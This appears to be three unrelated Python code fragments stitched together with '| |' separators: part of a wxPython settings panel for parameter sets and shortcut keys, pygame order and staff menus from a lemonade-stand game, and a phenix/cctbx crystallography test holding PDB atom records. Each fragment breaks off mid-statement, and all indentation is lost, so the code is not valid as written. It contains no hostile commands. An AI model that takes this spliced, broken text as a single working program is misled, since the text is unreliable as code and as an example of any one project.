# update paramsdic
self.paramsdic=copy.deepcopy(self.defaultparamsdic)
self.paramsdic.update(paramsdic)
# make color dic
self.elmcolordic=self.paramsdic['element-color']
self.elmnamlst=self.elmcolordic.keys()
self.rescolordic=self.paramsdic['aa-residue-color']
self.resnamlst=self.rescolordic.keys()
self.chaincolordic=self.paramsdic['aa-chain-color']
self.chainnamlst=self.chaincolordic.keys()
# clear itemcolordic
self.itemcolordic={}
#try:
for item in ['element','residue','chain']:
self.DestroyColorButtonsOnPanel(self.colorpanelobjdic[item][1])
# re-created item color panel
pan=self.colorpanelobjdic['element'][0]
colorobjdic=self.CreateColorButtonsOnPanel(pan,'element',self.elmnamlst,self.elmcolordic)
self.colorpanelobjdic['element']=[pan,colorobjdic]
pan=self.colorpanelobjdic['residue'][0]
colorobjdic=self.CreateColorButtonsOnPanel(pan,'residue',self.resnamlst,self.rescolordic)
self.colorpanelobjdic['residue']=[pan,colorobjdic]
pan=self.colorpanelobjdic['chain'][0]
colorobjdic=self.CreateColorButtonsOnPanel(pan,'chain',self.chainnamlst,self.chaincolordic)
self.colorpanelobjdic['chain']=[pan,colorobjdic]
#except: pass
# make type and widget object dictionary
paramobj=self.ParamObjDefinition()
self.paramwidgetdic=self.parent.MakeParamWidgetDic(paramobj)
# set color on buttoms
self.SetParamsToWidgets(self.paramsdic)
# update parent curset
self.curset=curset
self.parent.SetCurrentParamSet(self.panelnam,self.curset)
def ResetCurrentSet(self,curset):
self.curset=curset
self.cmbfil.SetStringSelection(self.curset)
self.OnFile(1)
def OnNewFile(self,event):
self.parent.Message('')
if not self.saveas and not self.rename: return
setnam=self.cmbfil.GetValue()
if len(setnam) <= 0:
self.parent.Message('No file name ')
return
try: idx=self.filelst.index(setnam)
except: idx=-1
if idx >= 0:
mess='the name is duplicate. please input a different name'
lib.MessageBoxOK(mess,"")
return
if self.rename:
retcode=self.Rename(self.curset,setnam)
self.cmbfil.SetValue(self.curset)
if self.saveas:
self.SaveFile()
#
self.curset=setnam
self.filelst.append(self.curset)
self.cmbfil.SetItems(self.filelst)
self.cmbfil.SetValue(self.curset)
self.parent.Message('Created new parameter set '+'"'+setnam+'"')
# update 'Model' current and filelst
self.parent.SetCurrentParamSet(self.panelnam,self.curset)
self.parent.paramsetfiledic[self.panelnam]=self.filelst
self.saveas=False
#
self.saveas=False
self.rename=False
def Rename(self,oldnam,newnam):
customdir=self.setctrl.GetDir('Customize')
oldfile=os.path.join(customdir,oldnam+'.model')
newfile=oldfile.replace(oldnam,newnam)
if os.path.exists(newfile):
mess='the file "'+newfile+' " already exists. try a diferent name.'
self.parant.Message(mess)
return False
# remame project file name
try: os.rename(oldfile,newfile)
except:
mess='Failed rename "'+oldnam+'" to "'+newnam+'"'
return False
idx=self.filelst.index(oldnam)
if idx >= 0: self.filelst[idx]=newnam
else:
self.parent.Message('Error occured in renaming '+'"'+oldnam+'" to "'+newnam+'"')
return False
self.curset=newnam
# set items to widget
self.cmbfil.SetItems(self.filelst)
self.cmbfil.SetValue(self.curset)
# update 'Project' current and filelst
self.parent.SetCurrentParamSet(self.panelnam,self.curset)
self.parent.paramsetfiledic[self.panelnam]=self.filelst
self.parent.Message('Renamed '+'"'+oldnam+'" to "'+newnam+'"')
return True
def OnViewFile(self,event):
self.parent.Message('')
self.parent.ViewSelectedFile(self.cmbfil,'.model') #,self.panelnam)
def IsSaved(self):
return self.saved
def XXApply(self):
pass
def Cancel(self):
self.saveas=False
mess='Model parameter assignment was canceled.'
self.parent.StatusMessage(mess)
self.saved=True
def DelFile(self):
self.saveas=False
self.parent.Message('')
self.parent.DelSelectedFile(self.cmbfil,'.model')
setnam=self.cmbfil.GetValue()
self.filelst.remove(setnam)
self.cmbfil.SetItems(self.filelst)
if len(self.filelst) > 0: self.curset=self.filelst[0]
else: self.curset=''
self.cmbfil.SetStringSelection(self.curset)
self.parent.SetCurrentParamSet(self.panelnam,self.curset)
self.parent.paramsetfiledic[self.panelnam]=self.filelst
self.parent.Message('param set file "'+setnam+'" was deleted')
def RenameFile(self):
self.rename=True
mess='Input name in "Model param set file" window and hit "Enter"'
lib.MessageBoxOK(mess,"")
self.cmbfil.SetValue('')
def SaveFile(self):
self.saveas=False
self.parent.Message('')
self.GetParamsFromWidgets()
filename=self.cmbfil.GetValue()
if len(filename) <= 0:
self.parent.Message('No file name in param set file window')
return
#
filename=self.parent.MakeFullPathName(filename,'.model')
print 'filename in save',filename
text='model parameters'
Customize_Frm.WriteParamSetFile(filename,text,self.paramtypedic,self.newparamdic)
#
self.parent.Message('Saved "'+filename+'".')
self.saved=True
def SaveFileAs(self):
self.saveas=True
mess='Input param set name in "Add-on menu file" window and hit "Enter"'
lib.MessageBoxOK(mess,"")
self.cmbfil.SetValue('')
class CustomShortcut():
""" Shortcut setting panel called in 'Setting_Frm' class
:param obj parent: 'Setting_Frm'
:param obj pagepanel: parent notebook panel.
:param obj model: instance of 'Model' class
"""
def __init__(self,parent,pagepanel,model):
self.classnam='SettingAddOn'
self.panelnam='Shortcut'
self.parent=parent
self.pagepanel=pagepanel
self.model=model #parent.model #self.parent.model
self.winctrl=model.winctrl
self.setctrl=model.setctrl
self.menuctrl=model.menuctrl
self.pagepanel.SetBackgroundColour('light gray')
#
self.saved=True
self.saveas=False
self.rename=False
self.selectedcolumn=-1
self.menuitem=''
self.menuitemlst=[]
#
self.filelst=self.parent.paramsetfiledic[self.panelnam]
self.curset=self.parent.curparamsetdic[self.panelnam]
# reserved shortcutkey
self.reservedkeydic=ctrl.SettingCtrl.ReservedShortcutKey()
self.keyassigneddic={}
#
self.menutoplst,self.menulabeldic=self.menuctrl.MakeMenuLabelDic()
self.menulabeldic['All']=['','']
if len(self.menutoplst) > 0: self.menuitem=self.menutoplst[0]
else: self.menuitem=''
# create panel
self.CreatePanel()
# read shortcut key file
self.OnFile(1)
def CreatePanel(self):
size=self.parent.GetSize(); w=size[0]; h=size[1]
self.panel=self.pagepanel
hcb=const.HCBOX
yloc=10
# create file button
title='Shortcut definition file:'
sttip=wx.StaticText(self.panel,-1,title,pos=(10,yloc),size=(140,18))
sttip.SetToolTipString('Select shortcut definotion name(file,*.shortcut)')
self.cmbfil=wx.ComboBox(self.panel,wx.ID_ANY,"",pos=(150,yloc-2),size=(180,hcb))
self.cmbfil.Bind(wx.EVT_COMBOBOX,self.OnFile)
self.cmbfil.Bind(wx.EVT_TEXT_ENTER,self.OnNewFile)
self.cmbfil.SetItems(self.filelst)
self.cmbfil.SetStringSelection(self.curset) #self.curparamsetdic['Shortcut'])
btnview=wx.Button(self.panel,-1,"View",pos=(350,yloc-2),size=(40,20))
btnview.SetToolTipString('View/Edit the file with editor')
btnview.Bind(wx.EVT_BUTTON,self.OnViewFile)
#
yloc += 25
wx.StaticLine(self.panel,pos=(-1,yloc),size=(w,4),style=wx.LI_HORIZONTAL)
yloc += 10
wx.StaticText(self.panel,-1,"Select top menu:",pos=(10,yloc),size=(110,18))
self.cmbmenu=wx.ComboBox(self.panel,wx.ID_ANY,"",pos=(130,yloc-2),size=(120,hcb))
self.cmbmenu.Bind(wx.EVT_COMBOBOX,self.OnMenuItem)
self.cmbmenu.SetItems(self.menutoplst)
self.cmbmenu.SetValue(self.menuitem)
btncurset=wx.Button(self.panel,-1,"View all",pos=(270,yloc-2),size=(80,20))
btncurset.SetToolTipString('View settings in all top menus')
btncurset.Bind(wx.EVT_BUTTON,self.OnViewAll)
xsize=w-20 #self.sashposition
ysize=h-100
###if lib.GetPlatform() == 'WINDOWS': hpanlst=h-195
yloc=yloc+25; ybtn=150 # 25
xpanlst=xsize-10 #550
hpanlst=h-yloc-ybtn #170
self.lstctrl=wx.ListCtrl(self.panel,-1,pos=(10,yloc),size=(xpanlst,hpanlst), #250),
style=wx.LC_REPORT) #|wx.LC_EDIT_LABELS) # LC_SINGLE_SEL
self.lstctrl.Bind(wx.EVT_LIST_ITEM_SELECTED,self.OnSelected)
self.lstctrl.SetToolTipString('Select a line and push keyboard key ("space" key cancels)')
self.lstctrl.Bind(wx.EVT_LIST_KEY_DOWN,self.OnKeyDown)
self.lstctrl.InsertColumn(0,'#',width=40,format=wx.LIST_FORMAT_RIGHT)
self.lstctrl.InsertColumn(1,'key',width=45,format=wx.LIST_FORMAT_CENTER)
self.lstctrl.InsertColumn(2,'submenu label',width=200)
self.lstctrl.InsertColumn(3,'tip or top menu label',width=200)
# set string item
yloc=300
pos=[-1,yloc]
self.butnpan=CommonActionButtons(self.parent,self.pagepanel,self,pos)
def Initialize(self):
self.filelst=self.parent.paramsetfiledic[self.panelnam]
self.curset=self.parent.curparamsetdic[self.panelnam]
if self.curset == "":
self.cmbfil.SetValue(self.curset)
self.LoadDefault()
mess='No parameter set file. Default param set is loaded.'
self.parent.Message(mess)
else: self.cmbfil.SetStringSelection(self.curset)
#
if self.curset == '': self.LoadDefault()
else: self.OnFile(1)
#
self.saveas=False
self.saved=True
def SetStringData(self,menuitem):
if menuitem == '': return
# delete all items
self.lstctrl.DeleteAllItems()
#
self.selectcolumn=-1; i=0; nkey=0
indx=self.lstctrl.InsertStringItem(200,'')
for i in range(len(self.menulabeldic[menuitem])):
label=self.menulabeldic[menuitem][i][0]
tip=self.menulabeldic[menuitem][i][1]
keychar=''
for key, lst in self.keyassigneddic.iteritems():
if self.menuitem == 'All':
if lst[1] == label:
keychar=key; break
else:
if lst[0] == self.menuitem and lst[1] == label:
keychar=key; break
#if apply and key == '': continue
indx=self.lstctrl.InsertStringItem(200,str(i+1))
self.lstctrl.SetStringItem(indx,1,keychar)
self.lstctrl.SetStringItem(indx,2,label)
self.lstctrl.SetStringItem(indx,3,tip)
if keychar != '': nkey += 1
i += 1
def OnSelected(self,event):
self.saveas=False
self.selectedcolumn=self.lstctrl.GetFirstSelected()
self.parent.StatusMessage('')
def OnKeyDown(self,event):
self.saveas=False
if self.selectedcolumn <= 0: return
keycode=event.GetKeyCode()
if keycode == 32: keychar='' # space key
else: keychar=ctrl.MouseCtrl.UniCodeToChar(keycode) # the widget uses unicode(not ASCII)
#print 'keycode,keychar',keycode,keychar
if keycode != 32 and self.keyassigneddic.has_key(keychar):
mess='the key | |
index = 0
starting_x = 20
starting_y = 100
button_dimension = 25
buttons = [False] *2*len(possible_orders)
prices = []
for order in possible_orders:
item_name_x = starting_x
item_name_y = starting_y + index*50
lemon_price = round(pricing.get_lemon_discountedprice(timedelta(hours=order[1]), order[0]),2)
prices.append(lemon_price)
button_coords = [(item_name_x+600, item_name_y, button_dimension, button_dimension),
(item_name_x+640, item_name_y, button_dimension, button_dimension),
(item_name_x+680, item_name_y, button_dimension, button_dimension)]
draw_text(str(order[0]), font, (255, 255, 255), screen , item_name_x, item_name_y)
draw_text(str(order[1])+' HR', font, (255, 255, 255), screen , item_name_x+200, item_name_y)
draw_text(str(lemon_price), font, (255, 255, 255), screen , item_name_x+400, item_name_y)
buttons[index*2] = button(screen, '-', (0,0,0,100), (0,0,0,255), button_coords[0], font, click)
button(screen, str(order_amounts[index]), (0,0,0,0), (0,0,0,0), button_coords[1], font, click)
buttons[index*2+1] = button(screen, '+', (0,0,0,100), (0,0,0,255), button_coords[2], font, click)
index += 1
place_order = button(screen, 'Place Order', (0,0,0,100), (0,0,0,255), (50,500,300,50), font, click)
return_to_inventory = button(screen, 'Back', (0,0,0,100), (0,0,0,255), (400,500,300,50), font, click)
if click:
for i in range(len(buttons)):
if buttons[i]:
if i % 2 != 0:
if order_amounts[int(i/2)] == amounts_max:
pass
else:
order_amounts[int(i/2)] +=1
else:
if order_amounts[int((i+1)/2)] == amounts_min:
pass
else:
order_amounts[int((i+1)/2)] -=1
if place_order:
#Calculate cost
total_cost = 0
for i in range(len(order_amounts)):
total_cost += order_amounts[i]*prices[i]
print(total_cost)
#Check for enough cash
if total_cost <= lemonade_stand.account_balance:
order_message = 'Order Placed'
#Do the orders
index = 0
for order in possible_orders:
if order_amounts[index] != 0:
order_num = 0
while order_num < order_amounts[index]:
lemon_order = Order(order_dt=lemonade_game.current_datetime, delivery_dt=lemonade_game.current_datetime+timedelta(hours=order[1]), amount=order[0])
lemonade_stand.lemonstock.add_order(lemon_order)
order_num += 1
index += 1
#Pay
lemonade_stand.account_balance -= total_cost
else:
order_message = 'Order too expensive'
if return_to_inventory:
done = True
click = False
screen.blit(font.render(order_message, 1, (0,0,0)), [10,380])
pygame.display.update()
#Events
for event in pygame.event.get():
# Close button clicked
if event.type == pygame.QUIT:
done = True
if event.type == pygame.MOUSEBUTTONDOWN:
#Clicked on start game
if event.button == 1:
click = True
if event.type == pygame.KEYDOWN:
# Escape key pressed
if event.key == pygame.K_ESCAPE:
done = True
def sugar_order_menu(lemonade_game):
screen = lemonade_game.screen
background = create_menu_background(screen)
order_sugar_image = pygame.image.load('./resources/background.png')
order_message = ''
#(amount, time(hrs))
possible_orders = [(100,1),(250,2),(500,6),(1000,24)]
order_amounts = [0] * len(possible_orders)
lemonade_stand = lemonade_game.lemonade_stand
done = False
click = False
while not done:
screen.blit(background, (0,0))
screen.blit(order_sugar_image, (0,0))
font = pygame.font.Font(FONT_STYLE,15)
draw_text('Order Sugar', font, (255, 255, 255), screen, 20, 20)
draw_text('Quantity [g]', font, (255, 255, 255), screen, 20, 70)
draw_text('Arrives In', font, (255, 255, 255), screen, 20+200, 70)
draw_text('Price', font, (255, 255, 255), screen, 20+400, 70)
draw_text('Order', font, (255, 255, 255), screen, 20+600, 70)
#Implement menu to order from, times in hours
amounts_min = 0
amounts_max = 10
index = 0
starting_x = 20
starting_y = 100
button_dimension = 25
buttons = [False] *2*len(possible_orders)
prices = []
for order in possible_orders:
item_name_x = starting_x
item_name_y = starting_y + index*50
#Convert amount ordered to kg so pricing makes sense
sugar_price = round(pricing.get_sugar_discountedprice(timedelta(hours=order[1]), order[0]/1000),2)
prices.append(sugar_price)
button_coords = [(item_name_x+600, item_name_y, button_dimension, button_dimension),
(item_name_x+640, item_name_y, button_dimension, button_dimension),
(item_name_x+680, item_name_y, button_dimension, button_dimension)]
draw_text(str(order[0]), font, (255, 255, 255), screen , item_name_x, item_name_y)
draw_text(str(order[1])+' HR', font, (255, 255, 255), screen , item_name_x+200, item_name_y)
draw_text(str(sugar_price), font, (255, 255, 255), screen , item_name_x+400, item_name_y)
buttons[index*2] = button(screen, '-', (0,0,0,100), (0,0,0,255), button_coords[0], font, click)
button(screen, str(order_amounts[index]), (0,0,0,0), (0,0,0,0), button_coords[1], font, click)
buttons[index*2+1] = button(screen, '+', (0,0,0,100), (0,0,0,255), button_coords[2], font, click)
index += 1
place_order = button(screen, 'Place Order', (0,0,0,100), (0,0,0,255), (50,500,300,50), font, click)
return_to_inventory = button(screen, 'Back', (0,0,0,100), (0,0,0,255), (400,500,300,50), font, click)
if click:
for i in range(len(buttons)):
if buttons[i]:
if i % 2 != 0:
if order_amounts[int(i/2)] == amounts_max:
pass
else:
order_amounts[int(i/2)] +=1
else:
if order_amounts[int((i+1)/2)] == amounts_min:
pass
else:
order_amounts[int((i+1)/2)] -=1
if place_order:
#Calculate cost
total_cost = 0
for i in range(len(order_amounts)):
total_cost += order_amounts[i]*prices[i]
print(total_cost)
#Check for enough cash
if total_cost <= lemonade_stand.account_balance:
order_message = 'Order Placed'
#Do the orders
index = 0
for order in possible_orders:
if order_amounts[index] != 0:
order_num = 0
while order_num < order_amounts[index]:
sugar_order = Order(order_dt=lemonade_game.current_datetime, delivery_dt=lemonade_game.current_datetime+timedelta(hours=order[1]), amount=order[0])
lemonade_stand.sugarstock.add_order(sugar_order)
order_num += 1
index += 1
#Pay
lemonade_stand.account_balance -= total_cost
else:
order_message = 'Order too expensive'
if return_to_inventory:
done = True
click = False
screen.blit(font.render(order_message, 1, (0,0,0)), [10,380])
pygame.display.update()
#Events
for event in pygame.event.get():
# Close button clicked
if event.type == pygame.QUIT:
done = True
if event.type == pygame.MOUSEBUTTONDOWN:
#Clicked on start game
if event.button == 1:
click = True
if event.type == pygame.KEYDOWN:
# Escape key pressed
if event.key == pygame.K_ESCAPE:
done = True
def ice_order_menu(lemonade_game):
screen = lemonade_game.screen
background = create_menu_background(screen)
order_ice_image = pygame.image.load('./resources/background.png')
order_message = ''
#(amount, time(hrs))
possible_orders = [(50,4),(100,8),(200,10),(500,12)]
order_amounts = [0] * len(possible_orders)
lemonade_stand = lemonade_game.lemonade_stand
done = False
click = False
while not done:
screen.blit(background, (0,0))
screen.blit(order_ice_image, (0,0))
font = pygame.font.Font(FONT_STYLE,15)
draw_text('Order Ice', font, (255, 255, 255), screen, 20, 20)
draw_text('Quantity [units]', font, (255, 255, 255), screen, 20, 70)
draw_text('Arrives In', font, (255, 255, 255), screen, 20+200, 70)
draw_text('Price', font, (255, 255, 255), screen, 20+400, 70)
draw_text('Order', font, (255, 255, 255), screen, 20+600, 70)
#Implement menu to order from, times in hours
amounts_min = 0
amounts_max = 10
index = 0
starting_x = 20
starting_y = 100
button_dimension = 25
buttons = [False] *2*len(possible_orders)
prices = []
for order in possible_orders:
item_name_x = starting_x
item_name_y = starting_y + index*50
ice_price = 0
prices.append(ice_price)
button_coords = [(item_name_x+600, item_name_y, button_dimension, button_dimension),
(item_name_x+640, item_name_y, button_dimension, button_dimension),
(item_name_x+680, item_name_y, button_dimension, button_dimension)]
draw_text(str(order[0]), font, (255, 255, 255), screen , item_name_x, item_name_y)
draw_text(str(order[1])+' HR', font, (255, 255, 255), screen , item_name_x+200, item_name_y)
draw_text(str(ice_price), font, (255, 255, 255), screen , item_name_x+400, item_name_y)
buttons[index*2] = button(screen, '-', (0,0,0,100), (0,0,0,255), button_coords[0], font, click)
button(screen, str(order_amounts[index]), (0,0,0,0), (0,0,0,0), button_coords[1], font, click)
buttons[index*2+1] = button(screen, '+', (0,0,0,100), (0,0,0,255), button_coords[2], font, click)
index += 1
place_order = button(screen, 'Place Order', (0,0,0,100), (0,0,0,255), (50,500,300,50), font, click)
return_to_inventory = button(screen, 'Back', (0,0,0,100), (0,0,0,255), (400,500,300,50), font, click)
if click:
for i in range(len(buttons)):
if buttons[i]:
if i % 2 != 0:
if order_amounts[int(i/2)] == amounts_max:
pass
else:
order_amounts[int(i/2)] +=1
else:
if order_amounts[int((i+1)/2)] == amounts_min:
pass
else:
order_amounts[int((i+1)/2)] -=1
if place_order:
#Calculate cost
total_cost = 0
for i in range(len(order_amounts)):
total_cost += order_amounts[i]*prices[i]
print(total_cost)
#Check for enough cash
if total_cost <= lemonade_stand.account_balance:
order_message = 'Order Placed'
#Do the orders
index = 0
for order in possible_orders:
if order_amounts[index] != 0:
order_num = 0
while order_num < order_amounts[index]:
ice_order = Order(order_dt=lemonade_game.current_datetime, delivery_dt=lemonade_game.current_datetime+timedelta(hours=order[1]), amount=order[0])
lemonade_stand.icestock.add_order(ice_order)
order_num += 1
index += 1
#Pay
lemonade_stand.account_balance -= total_cost
else:
order_message = 'Order too expensive'
if return_to_inventory:
done = True
click = False
screen.blit(font.render(order_message, 1, (0,0,0)), [10,380])
pygame.display.update()
#Events
for event in pygame.event.get():
# Close button clicked
if event.type == pygame.QUIT:
done = True
if event.type == pygame.MOUSEBUTTONDOWN:
#Clicked on start game
if event.button == 1:
click = True
if event.type == pygame.KEYDOWN:
# Escape key pressed
if event.key == pygame.K_ESCAPE:
done = True
def employee_menu(lemonade_game):
screen = lemonade_game.screen
background = create_menu_background(screen)
employee_image = pygame.image.load('./resources/background.png')
lemonade_stand = lemonade_game.lemonade_stand
wages = [20, 30, 40]
done = False
click = False
while not done:
current_employees = lemonade_stand.get_current_employees() #Get employees
employee_count = [0, 0, 0]
for employee in current_employees:
if employee.get_daily_wage() == wages[0]:
employee_count[0] += 1
elif employee.get_daily_wage() == wages[1]:
employee_count[1] += 1
else:
employee_count[2] += 1
screen.blit(background, (0,0))
screen.blit(employee_image, (0,0))
font = pygame.font.Font(FONT_STYLE,15) #Edit fonts here
draw_text('Current Staff', font, (255, 255, 255), screen, 20, 20)
#Try to make this into a loop through different employee wage
buttons = [False]*len(wages)*2
index = 0
x_start, y_start = 20, 100
button_h, button_w = 75, 25
spacing = 100
for i in range(len(wages)):
item_name_x = x_start
item_name_y = y_start + index*spacing #Next line is 30 down
item_display = str(employee_count[i]) + ' employees paid at '+ str(wages[i]) + ' $/day'#+ ', quantity ordered:' + str(round(value))
draw_text(item_display, font, (255, 255, 255), screen , item_name_x, item_name_y)
buttons[index*2] = button(screen, 'Fire', (0,0,0,100), (0,0,0,255), (item_name_x+290,item_name_y+25,button_h,button_w), font, click)
buttons[index*2+1] = button(screen, 'Hire', (0,0,0,100), (0,0,0,255), (item_name_x+390,item_name_y+25,button_h,button_w), font, click)
index += 1
#Buttons to accept recipe and return to game
return_to_game = button(screen, 'Resume Game', (0,0,0,100), (0,0,0,255), (400,500,300,50), font, click)
if click:
for i in range(len(buttons)):
if buttons[i]:
if i % 2 == 0:
lemonade_stand.fire_employee(lemonade_stand.employee_image_dict,lemonade_game.current_datetime.time(),wages[int(i/2)])
else:
lemonade_stand.hire_employee(lemonade_stand.opening_time,lemonade_stand.closing_time,lemonade_stand.employee_image_dict,lemonade_game.current_datetime.time(),wages[int((i-1)/2)])
if return_to_game:
done = True
click = False
pygame.display.update()
#Events
for | |
from __future__ import division
from libtbx.test_utils import Exception_expected
from libtbx.utils import null_out, Sorry
from libtbx import easy_run
def exercise_main():
from mmtbx.refinement import select_best_starting_model
from iotbx import file_reader
from cctbx import uctbx
from cctbx import sgtbx
from scitbx.array_family import flex
import random
unit_cell = (24.937, 8.866, 25.477, 90.00, 107.08, 90.00)
space_group = "P21"
pdb_base = """\
CRYST1 24.937 8.866 25.477 90.00 107.08 90.00 P 1 21 1
SCALE1 0.040101 0.000000 0.012321 0.00000
SCALE2 0.000000 0.112790 0.000000 0.00000
SCALE3 0.000000 0.000000 0.041062 0.00000
ATOM 1 N GLY A 1 8.992 0.474 -6.096 1.00 16.23 N
ATOM 2 CA GLY A 1 9.033 0.047 -4.707 1.00 16.20 C
ATOM 3 C GLY A 1 7.998 -1.029 -4.448 1.00 15.91 C
ATOM 4 O GLY A 1 7.548 -1.689 -5.385 1.00 16.11 O
ATOM 5 N ASN A 2 7.625 -1.218 -3.185 1.00 15.02 N
ATOM 6 CA ASN A 2 6.523 -2.113 -2.848 1.00 13.92 C
ATOM 7 C ASN A 2 5.220 -1.618 -3.428 1.00 12.24 C
ATOM 8 O ASN A 2 4.955 -0.418 -3.432 1.00 11.42 O
ATOM 9 CB ASN A 2 6.376 -2.261 -1.340 1.00 14.42 C
ATOM 10 CG ASN A 2 7.620 -2.786 -0.697 1.00 13.92 C
ATOM 11 OD1 ASN A 2 8.042 -3.915 -0.978 1.00 14.39 O
ATOM 12 ND2 ASN A 2 8.232 -1.975 0.168 1.00 12.78 N
ATOM 13 N ASN A 3 4.406 -2.553 -3.904 1.00 12.20 N
ATOM 14 CA ASN A 3 3.164 -2.226 -4.594 1.00 11.81 C
ATOM 15 C ASN A 3 1.925 -2.790 -3.910 1.00 10.59 C
ATOM 16 O ASN A 3 1.838 -3.991 -3.653 1.00 10.32 O
ATOM 17 CB ASN A 3 3.231 -2.727 -6.046 1.00 12.51 C
ATOM 18 CG ASN A 3 1.973 -2.405 -6.848 1.00 12.59 C
ATOM 19 OD1 ASN A 3 1.662 -1.239 -7.106 1.00 13.64 O
ATOM 20 ND2 ASN A 3 1.260 -3.443 -7.268 1.00 12.39 N
ATOM 21 N GLN A 4 0.973 -1.913 -3.608 1.00 10.34 N
ATOM 22 CA GLN A 4 -0.366 -2.335 -3.208 1.00 10.00 C
ATOM 23 C GLN A 4 -1.402 -1.637 -4.085 1.00 10.21 C
ATOM 24 O GLN A 4 -1.514 -0.414 -4.070 1.00 8.99 O
ATOM 25 CB GLN A 4 -0.656 -2.027 -1.736 1.00 10.00 C
ATOM 26 CG GLN A 4 -1.927 -2.705 -1.229 1.00 10.50 C
ATOM 27 CD GLN A 4 -2.482 -2.102 0.060 1.00 11.36 C
ATOM 28 OE1 GLN A 4 -2.744 -0.900 0.151 1.00 12.29 O
ATOM 29 NE2 GLN A 4 -2.684 -2.951 1.055 1.00 10.43 N
ATOM 30 N GLN A 5 -2.154 -2.406 -4.857 1.00 10.48 N
ATOM 31 CA GLN A 5 -3.247 -1.829 -5.630 1.00 11.24 C
ATOM 32 C GLN A 5 -4.591 -2.382 -5.178 1.00 11.40 C
ATOM 33 O GLN A 5 -4.789 -3.599 -5.092 1.00 11.94 O
ATOM 34 CB GLN A 5 -3.024 -2.023 -7.129 1.00 11.14 C
ATOM 35 CG GLN A 5 -1.852 -1.222 -7.653 1.00 10.65 C
ATOM 36 CD GLN A 5 -1.338 -1.748 -8.965 1.00 10.73 C
ATOM 37 OE1 GLN A 5 -0.794 -2.845 -9.028 1.00 10.14 O
ATOM 38 NE2 GLN A 5 -1.511 -0.968 -10.027 1.00 11.31 N
ATOM 39 N ASN A 6 -5.504 -1.471 -4.872 1.00 11.56 N
ATOM 40 CA ASN A 6 -6.809 -1.838 -4.359 1.00 12.07 C
ATOM 41 C ASN A 6 -7.856 -1.407 -5.353 1.00 13.18 C
ATOM 42 O ASN A 6 -8.257 -0.251 -5.362 1.00 13.64 O
ATOM 43 CB ASN A 6 -7.053 -1.149 -3.017 1.00 12.12 C
ATOM 44 CG ASN A 6 -5.966 -1.446 -1.998 1.00 12.31 C
ATOM 45 OD1 ASN A 6 -5.833 -2.579 -1.517 1.00 13.43 O
ATOM 46 ND2 ASN A 6 -5.198 -0.423 -1.645 1.00 11.88 N
ATOM 47 N TYR A 7 -8.298 -2.332 -6.193 1.00 14.34 N
ATOM 48 CA TYR A 7 -9.162 -1.980 -7.317 1.00 15.00 C
ATOM 49 C TYR A 7 -10.603 -1.792 -6.893 1.00 15.64 C
ATOM 50 O TYR A 7 -11.013 -2.278 -5.838 1.00 15.68 O
ATOM 51 CB TYR A 7 -9.064 -3.041 -8.412 1.00 15.31 C
ATOM 52 CG TYR A 7 -7.657 -3.197 -8.931 1.00 15.06 C
ATOM 53 CD1 TYR A 7 -6.785 -4.118 -8.368 1.00 15.24 C
ATOM 54 CD2 TYR A 7 -7.193 -2.400 -9.960 1.00 14.96 C
ATOM 55 CE1 TYR A 7 -5.489 -4.253 -8.830 1.00 14.94 C
ATOM 56 CE2 TYR A 7 -5.905 -2.526 -10.429 1.00 15.13 C
ATOM 57 CZ TYR A 7 -5.055 -3.451 -9.861 1.00 14.97 C
ATOM 58 OH TYR A 7 -3.768 -3.572 -10.335 1.00 14.93 O
ATOM 59 OXT TYR A 7 -11.378 -1.149 -7.601 1.00 15.89 O
TER
"""
pdb_base_water = """\
HETATM 64 O HOH S 1 -10.466 -2.347 -3.168 1.00 17.57 O
HETATM 65 O HOH S 2 6.469 1.081 -7.070 1.00 21.27 O
HETATM 66 O HOH S 3 -11.809 0.108 -9.956 1.00 27.52 O
HETATM 67 O HOH S 4 1.580 -3.455 -11.035 1.00 44.76 O
END
"""
open("tst_start_model_base.pdb", "w").write(pdb_base+pdb_base_water)
params = """
high_resolution = 1.75
add_sigmas = True
pdb_file = tst_start_model_base.pdb
output {
label = F
type = *real complex
file_name = tst_start_model_base.mtz
}
"""
open("tst_start_model_fmodel.eff", "w").write(params)
assert (easy_run.fully_buffered(
"phenix.fmodel tst_start_model_fmodel.eff"
).raise_if_errors().return_code == 0)
mtz_in = file_reader.any_file("tst_start_model_base.mtz")
f_obs = mtz_in.file_server.miller_arrays[0]
symm = f_obs.crystal_symmetry().customized_copy(
space_group_info=sgtbx.space_group_info("P2"))
f_obs = f_obs.customized_copy(crystal_symmetry=symm)
random.seed(12345) # XXX makes results more predictable
flags = f_obs.generate_r_free_flags(fraction=0.1)
mtz_data = f_obs.as_mtz_dataset(
column_root_label="F")
mtz_data.add_miller_array(flags,
column_root_label="FreeR_flag")
mtz_data.mtz_object().write("tst_start_model.mtz")
pdb_in = file_reader.any_file("tst_start_model_base.pdb")
hierarchy_in = pdb_in.file_object.hierarchy
xrs_in = pdb_in.file_object.xray_structure_simple()
selection = hierarchy_in.atom_selection_cache().selection
# Model 1: very few changes, but shifted by (1,0,0.5)
symm2 = xrs_in.crystal_symmetry().customized_copy(
unit_cell=uctbx.unit_cell((24.932, 8.841, 25.501, 90.00, 107.5, 90.00)))
#u_iso = xrs_in.extract_u_iso_or_u_equiv()
#xrs_out = xrs_in.deep_copy_scatterers().set_u_iso(
# selection=flex.bool(u_iso.size(), True), values=u_iso*1.1)
xrs_out = xrs_in.deep_copy_scatterers()
sites_cart = xrs_out.sites_cart()
sites_cart += flex.vec3_double(sites_cart.size(), (1.0, 0.0, 0.5))
xrs_out.set_sites_cart(sites_cart)
hierarchy_out = hierarchy_in.deep_copy()
hierarchy_out.adopt_xray_structure(xrs_out)
open("tst_start_model_1.pdb", "w").write(
hierarchy_out.as_pdb_string(crystal_symmetry=symm2))
# Model 2: no sidechains
mc_sele = selection("(name N or name C or name O or name CA or name CB)")
hierarchy_out = hierarchy_in.select(mc_sele)
xrs_out = xrs_in.select(mc_sele)
open("tst_start_model_2.pdb", "w").write(
hierarchy_out.as_pdb_string(crystal_symmetry=xrs_out))
# Model 3: P1 symmetry
symm3 = xrs_in.crystal_symmetry().customized_copy(
space_group_info=sgtbx.space_group_info("P1"))
open("tst_start_model_3.pdb", "w").write(
hierarchy_out.as_pdb_string(crystal_symmetry=symm3))
# Model 4: shaken coordinates and ADPs
def random_double(size, factor=1):
d = flex.double()
for x in range(size):
d.append(random.random() * factor)
return d
xrs_out = xrs_in.customized_copy()
xrs_out.shake_sites_in_place(0.3, random_double=random_double)
xrs_out.shake_adp()
hierarchy_out = hierarchy_in.deep_copy()
hierarchy_out.adopt_xray_structure(xrs_out)
open("tst_start_model_4.pdb", "w").write(
